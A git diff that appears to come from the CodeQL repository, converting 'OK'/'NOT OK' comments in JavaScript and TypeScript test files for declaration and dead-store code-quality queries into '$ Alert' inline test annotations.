a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..0b99d597f477 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js @@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { 
@@ -16,14 +16,13 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { x = 42; } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..26246c9cbf14 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { @@ -82,31 +82,31 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; 
@@ -115,24 +115,24 @@ o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..1e53a3a4a0f0 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; // $ Alert +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js 
@@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files 
diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
index 5aadd17c4d58..a9713de9685e 100644
--- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
+++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
@@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. 
interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js 
+++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 
--- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..6912653c27b5 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" 
@@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js 
@@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..142bcc8d55a3 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +\u0078 // $ Alert ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js 
@@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; 
diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 
--- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts 
@@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { 